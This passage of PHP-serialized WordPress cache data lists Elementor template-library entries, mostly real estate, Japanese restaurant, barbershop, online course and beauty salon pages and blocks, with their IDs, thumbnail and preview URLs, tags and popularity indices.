Home\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2020/07/Home.png\";s:12:\"tmpl_created\";i:1595313512;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:127:\"https://library.elementor.com/luxury-real-estate-home-page/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:28:\"[\"Real estate\",\"Realestate\"]\";s:10:\"menu_order\";i:95;s:16:\"popularity_index\";i:394;s:11:\"trend_index\";i:165;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:397;a:21:{s:4:\"tmpl\";i:690;s:2:\"id\";i:8989;s:5:\"title\";s:9:\"archive 7\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/06/Archive_350.7.jpg\";s:12:\"tmpl_created\";i:1528701063;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/archive-7/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:96;s:16:\"popularity_index\";i:208;s:11:\"trend_index\";i:111;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:398;a:21:{s:4:\"tmpl\";i:1018;s:2:\"id\";i:14763;s:5:\"title\";s:31:\"Luxury Real Estate &#8211; News\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2020/07/news-Archive.png\";s:12:\"tmpl_created\";i:1595313273;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:127:\"https://library.elementor.com/luxury-real-estate-news-page/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:28:\"[\"Real estate\",\"Realestate\"]\";s:10:\"menu_order\";i:96;s:16:\"popularity_index\";i:404;s:11:\"trend_index\";i:167;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:399;a:21:{s:4:\"tmpl\";i:1283;s:2:\"id\";i:22423;s:5:\"title\";s:39:\"Online Store &#8211; Under Construction\";s:9:\"thumbnail\";s:85:\"https://library.elementor.com/wp-content/uploads/2021/04/Library-Pic-Online-Store.png\";s:12:\"tmpl_created\";i:1647355154;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:130:\"https://library.elementor.com/online-store-under-construction/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:59:\"[\"Landing Pages\",\"Online Shop\",\"Shop\",\"Under Construction\"]\";s:10:\"menu_order\";i:97;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:400;a:21:{s:4:\"tmpl\";i:691;s:2:\"id\";i:8996;s:5:\"title\";s:9:\"archive 8\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/06/Archive_350.8.jpg\";s:12:\"tmpl_created\";i:1528701290;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/archive-8/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:98;s:16:\"popularity_index\";i:227;s:11:\"trend_index\";i:153;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:401;a:21:{s:4:\"tmpl\";i:1010;s:2:\"id\";i:13960;s:5:\"title\";s:32:\"Japanese restaurant &#8211; Home\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2020/06/Home-Page.jpg\";s:12:\"tmpl_created\";i:1592289775;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:128:\"https://library.elementor.com/japanese-restaurant-home-page/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:32:\"[\"Food\",\"Japanese\",\"Restaurant\"]\";s:10:\"menu_order\";i:98;s:16:\"popularity_index\";i:537;s:11:\"trend_index\";i:287;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:402;a:21:{s:4:\"tmpl\";i:1284;s:2:\"id\";i:22428;s:5:\"title\";s:40:\"Travel Agency &#8211; Under Construction\";s:9:\"thumbnail\";s:88:\"https://library.elementor.com/wp-content/uploads/2021/04/Library-Pic-Travel-Agency-1.png\";s:12:\"tmpl_created\";i:1647355339;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:131:\"https://library.elementor.com/travel-agency-under-construction/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:56:\"[\"Agency\",\"Landing Pages\",\"Travel\",\"Under Construction\"]\";s:10:\"menu_order\";i:99;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:403;a:21:{s:4:\"tmpl\";i:692;s:2:\"id\";i:9001;s:5:\"title\";s:9:\"archive 9\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/06/Archive_350.9.jpg\";s:12:\"tmpl_created\";i:1528701433;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/archive-9/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:100;s:16:\"popularity_index\";i:265;s:11:\"trend_index\";i:208;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:404;a:21:{s:4:\"tmpl\";i:1007;s:2:\"id\";i:13993;s:5:\"title\";s:45:\"Japanese restaurant &#8211; Chef&#8217;s Menu\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2020/06/Chef_s-Menu-Page.jpg\";s:12:\"tmpl_created\";i:1592289691;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:129:\"https://library.elementor.com/japanese-restaurant-chefs-menu/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:32:\"[\"Food\",\"Japanese\",\"Restaurant\"]\";s:10:\"menu_order\";i:100;s:16:\"popularity_index\";i:651;s:11:\"trend_index\";i:675;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:405;a:21:{s:4:\"tmpl\";i:1006;s:2:\"id\";i:14012;s:5:\"title\";s:36:\"Japanese restaurant &#8211; Bar Menu\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2020/06/Bar-Menu-Page.jpg\";s:12:\"tmpl_created\";i:1592289665;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:127:\"https://library.elementor.com/japanese-restaurant-bar-menu/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:32:\"[\"Food\",\"Japanese\",\"Restaurant\"]\";s:10:\"menu_order\";i:101;s:16:\"popularity_index\";i:735;s:11:\"trend_index\";i:829;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:406;a:21:{s:4:\"tmpl\";i:1005;s:2:\"id\";i:13917;s:5:\"title\";s:33:\"Japanese restaurant &#8211; About\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2020/06/About-Page.jpg\";s:12:\"tmpl_created\";i:1592289629;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:124:\"https://library.elementor.com/japanese-restaurant-about/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:32:\"[\"Food\",\"Japanese\",\"Restaurant\"]\";s:10:\"menu_order\";i:102;s:16:\"popularity_index\";i:640;s:11:\"trend_index\";i:389;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:407;a:21:{s:4:\"tmpl\";i:997;s:2:\"id\";i:13528;s:5:\"title\";s:22:\"Barbershop &#8211; 404\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2020/05/404-Page.jpg\";s:12:\"tmpl_created\";i:1589893152;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:120:\"https://library.elementor.com/blocks/barbershop-404/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"404 page\";s:4:\"tags\";s:34:\"[\"404\",\"Barber Shop\",\"Barbershop\"]\";s:10:\"menu_order\";i:103;s:16:\"popularity_index\";i:768;s:11:\"trend_index\";i:681;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:408;a:21:{s:4:\"tmpl\";i:1009;s:2:\"id\";i:13937;s:5:\"title\";s:35:\"Japanese restaurant &#8211; Gallery\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2020/06/Gallery-Page.jpg\";s:12:\"tmpl_created\";i:1592289748;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:126:\"https://library.elementor.com/japanese-restaurant-gallery/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:32:\"[\"Food\",\"Japanese\",\"Restaurant\"]\";s:10:\"menu_order\";i:103;s:16:\"popularity_index\";i:648;s:11:\"trend_index\";i:551;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:409;a:21:{s:4:\"tmpl\";i:1008;s:2:\"id\";i:14030;s:5:\"title\";s:34:\"Japanese restaurant &#8211; Events\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2020/06/Events-Page.jpg\";s:12:\"tmpl_created\";i:1592289713;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:125:\"https://library.elementor.com/japanese-restaurant-events/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:32:\"[\"Food\",\"Japanese\",\"Restaurant\"]\";s:10:\"menu_order\";i:104;s:16:\"popularity_index\";i:723;s:11:\"trend_index\";i:711;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:410;a:21:{s:4:\"tmpl\";i:998;s:2:\"id\";i:13518;s:5:\"title\";s:26:\"Barbershop &#8211; Archive\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2020/05/Blog-Page.jpg\";s:12:\"tmpl_created\";i:1589893157;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:124:\"https://library.elementor.com/blocks/barbershop-archive/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:28:\"[\"Barber Shop\",\"Barbershop\"]\";s:10:\"menu_order\";i:105;s:16:\"popularity_index\";i:737;s:11:\"trend_index\";i:523;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:411;a:21:{s:4:\"tmpl\";i:1016;s:2:\"id\";i:13984;s:5:\"title\";s:40:\"Japanese restaurant &#8211; Reservations\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2020/06/reservations.jpg\";s:12:\"tmpl_created\";i:1592294757;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:131:\"https://library.elementor.com/japanese-restaurant-reservations/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:32:\"[\"Food\",\"Japanese\",\"Restaurant\"]\";s:10:\"menu_order\";i:105;s:16:\"popularity_index\";i:715;s:11:\"trend_index\";i:727;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:412;a:21:{s:4:\"tmpl\";i:999;s:2:\"id\";i:13479;s:5:\"title\";s:23:\"Barbershop &#8211; Home\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2020/05/Home-Page.jpg\";s:12:\"tmpl_created\";i:1589893275;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/barbershop-home/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:28:\"[\"Barber Shop\",\"Barbershop\"]\";s:10:\"menu_order\";i:106;s:16:\"popularity_index\";i:683;s:11:\"trend_index\";i:832;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:413;a:21:{s:4:\"tmpl\";i:996;s:2:\"id\";i:13604;s:5:\"title\";s:25:\"Barbershop &#8211; Footer\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2020/05/Footer-Small.jpg\";s:12:\"tmpl_created\";i:1589893147;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:123:\"https://library.elementor.com/blocks/barbershop-footer/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:37:\"[\"Barber Shop\",\"Barbershop\",\"Footer\"]\";s:10:\"menu_order\";i:107;s:16:\"popularity_index\";i:555;s:11:\"trend_index\";i:267;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:414;a:21:{s:4:\"tmpl\";i:1000;s:2:\"id\";i:13503;s:5:\"title\";s:24:\"Barbershop &#8211; About\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2020/05/About-Page.jpg\";s:12:\"tmpl_created\";i:1589893289;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/barbershop-about/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:28:\"[\"Barber Shop\",\"Barbershop\"]\";s:10:\"menu_order\";i:107;s:16:\"popularity_index\";i:744;s:11:\"trend_index\";i:739;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:415;a:21:{s:4:\"tmpl\";i:995;s:2:\"id\";i:13612;s:5:\"title\";s:25:\"Barbershop &#8211; Header\";s:9:\"thumbnail\";s:79:\"https://library.elementor.com/wp-content/uploads/2020/06/barber-shop-header.jpg\";s:12:\"tmpl_created\";i:1589893142;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:123:\"https://library.elementor.com/blocks/barbershop-header/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:37:\"[\"Barber Shop\",\"Barbershop\",\"Header\"]\";s:10:\"menu_order\";i:108;s:16:\"popularity_index\";i:343;s:11:\"trend_index\";i:137;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:416;a:21:{s:4:\"tmpl\";i:1001;s:2:\"id\";i:13548;s:5:\"title\";s:27:\"Barbershop &#8211; Services\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2020/05/Services-Page.jpg\";s:12:\"tmpl_created\";i:1589893298;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:118:\"https://library.elementor.com/barbershop-services/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:28:\"[\"Barber Shop\",\"Barbershop\"]\";s:10:\"menu_order\";i:108;s:16:\"popularity_index\";i:761;s:11:\"trend_index\";i:0;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:417;a:21:{s:4:\"tmpl\";i:1002;s:2:\"id\";i:13560;s:5:\"title\";s:26:\"Barbershop &#8211; Gallery\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2020/05/Gallery-Page.jpg\";s:12:\"tmpl_created\";i:1589893307;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/barbershop-gallery/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:28:\"[\"Barber Shop\",\"Barbershop\"]\";s:10:\"menu_order\";i:109;s:16:\"popularity_index\";i:756;s:11:\"trend_index\";i:822;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:418;a:21:{s:4:\"tmpl\";i:1003;s:2:\"id\";i:13587;s:5:\"title\";s:26:\"Barbershop &#8211; Contact\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2020/05/Contact-Us-Page.jpg\";s:12:\"tmpl_created\";i:1589893315;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/barbershop-contact/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:28:\"[\"Barber Shop\",\"Barbershop\"]\";s:10:\"menu_order\";i:110;s:16:\"popularity_index\";i:753;s:11:\"trend_index\";i:0;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:419;a:21:{s:4:\"tmpl\";i:982;s:2:\"id\";i:13307;s:5:\"title\";s:26:\"Online Course &#8211; Home\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2020/04/Home.jpg\";s:12:\"tmpl_created\";i:1587474541;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/online-course-home/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:29:\"[\"Course Online\",\"Education\"]\";s:10:\"menu_order\";i:111;s:16:\"popularity_index\";i:230;s:11:\"trend_index\";i:125;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:420;a:21:{s:4:\"tmpl\";i:994;s:2:\"id\";i:13621;s:5:\"title\";s:30:\"Barbershop &#8211; Single Post\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2020/05/Single-Page.jpg\";s:12:\"tmpl_created\";i:1589893137;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:128:\"https://library.elementor.com/blocks/barbershop-single-post/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:28:\"[\"Barber Shop\",\"Barbershop\"]\";s:10:\"menu_order\";i:111;s:16:\"popularity_index\";i:736;s:11:\"trend_index\";i:580;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:421;a:21:{s:4:\"tmpl\";i:1131;s:2:\"id\";i:16527;s:5:\"title\";s:24:\"Beauty Salon &#8211; 404\";s:9:\"thumbnail\";s:64:\"https://library.elementor.com/wp-content/uploads/2020/12/404.jpg\";s:12:\"tmpl_created\";i:1608622517;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:122:\"https://library.elementor.com/blocks/beauty-salon-404/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"404 page\";s:4:\"tags\";s:29:\"[\"404\",\"Beauty Salon\",\"Hair\"]\";s:10:\"menu_order\";i:112;s:16:\"popularity_index\";i:742;s:11:\"trend_index\";i:563;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:422;a:21:{s:4:\"tmpl\";i:983;s:2:\"id\";i:13328;s:5:\"title\";s:27:\"Online Course &#8211; About\";s:9:\"thumbnail\";s:66:\"https://library.elementor.com/wp-content/uploads/2020/04/About.jpg\";s:12:\"tmpl_created\";i:1587474558;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:118:\"https://library.elementor.com/online-course-about/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:29:\"[\"Course Online\",\"Education\"]\";s:10:\"menu_order\";i:112;s:16:\"popularity_index\";i:508;s:11:\"trend_index\";i:429;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:423;a:21:{s:4:\"tmpl\";i:984;s:2:\"id\";i:13338;s:5:\"title\";s:33:\"Online Course &#8211; Course Page\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2020/04/Course-Page.png\";s:12:\"tmpl_created\";i:1587474574;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:124:\"https://library.elementor.com/online-course-course-page/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:29:\"[\"Course 